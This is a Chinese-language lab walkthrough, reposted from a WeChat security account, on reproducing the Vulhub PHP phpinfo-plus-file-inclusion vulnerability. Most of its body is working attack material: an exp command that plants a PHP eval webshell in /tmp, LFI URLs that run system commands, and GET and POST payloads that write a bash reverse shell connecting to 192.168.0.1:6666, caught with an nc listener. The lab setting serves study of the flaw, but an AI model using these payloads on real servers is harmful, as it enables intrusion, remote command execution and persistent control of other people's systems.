漏洞复现——php inclusion

admin 2022年11月9日23:29:18评论275 views字数 1326阅读4分25秒阅读模式

免责声明

本公众号所发布的文章及工具只限交流学习,本公众号不承担任何责任!如有侵权,请告知我们立即删除。

利用场景

存在phpinfo页面,且存在文件包含漏洞,在找不到好的文件包含getshell时,可以使用。

该漏洞和php版本无关,即全版本通用。

环境搭建

Vulhub搭建参考如下:

Vulnhub 靶场环境搭建

进入到vulbub靶场的/vulhub/php/inclusion/目录

执行docker-compose up -d 创建容器(在root权限下执行)

漏洞复现——php inclusion

下文出现的192.168.0.140在复现的过程中需要替换成你们vulhub搭建的ip,查看方法如下,需要注意使用docker搭建的靶场存在多张网卡,要确认好ip

漏洞复现——php inclusion

确认环境

访问phpinfo页面:

http://192.168.0.140:8080/phpinfo.php

漏洞复现——php inclusion

访问文件包含页面:

http://192.168.0.140:8080/lfi.php

漏洞复现——php inclusion

写入shell

执行exp命令:py -2 .exp.py 192.168.0.140 8080 100

漏洞复现——php inclusion

该exp写入一个永久的shell  /tmp/g<?=eval($_REQUEST[1])?>')?>


命令执行

利用文件包含,执行命令

http://192.168.0.140:8080/lfi.php?file=/tmp/g&1=system(%27id%27);

漏洞复现——php inclusion


写入反弹shell

通过get传递数据写入反弹shell

http://192.168.0.140:8080/lfi.php?file=/tmp/g&1=system('echo "<?php system("bash -c 'exec bash -i %26>/dev/tcp/192.168.0.1/6666 <%261'");?>">/tmp/2.php');

漏洞复现——php inclusion

通过构造成post传递数据写入反弹shell

http://192.168.0.140:8080/lfi.php?file=/tmp/g&1=system($_POST[s]);s=echo "<?php system("bash -c 'exec bash -i %26>/dev/tcp/192.168.0.1/6666 <%261'");?>">/tmp/2.php

页面显示报错,没关系,反弹shell已经成功写入漏洞复现——php inclusion

反弹shell

使用nc.exe -lvvp 6666 监听6666端口

漏洞复现——php inclusion

访问该页面利用文件包含执行反弹shell

http://192.168.0.140:8080/lfi.php?file=/tmp/2.php

显示正在连接,然后得到反弹shell

漏洞复现——php inclusion


获取exp

关注浪飒sec回复221109获取exp下载地址

漏洞复现——php inclusion

历史推荐

漏洞复现——CVE-2017-5645

工具推荐——三个Burp插件

AK4安全工具集装箱V1.0.1正式发布

哈希碰撞与生日攻击

Ubuntu 20.04 离线安装破解 Nessus 10.3.0

浅析《数据安全法》与《个人信息保护法》对各行业的影响

内网渗透 域渗透

域环境基础知识

企业安全必看书籍(文末附地址)

超全Hack报告/资料/文档/书籍(不关注我你必后悔的好东西)

原文始发于微信公众号(浪飒sec):漏洞复现——php inclusion

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月9日23:29:18
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现——php inclusionhttp://cn-sec.com/archives/1399953.html

发表评论

匿名网友 填写信息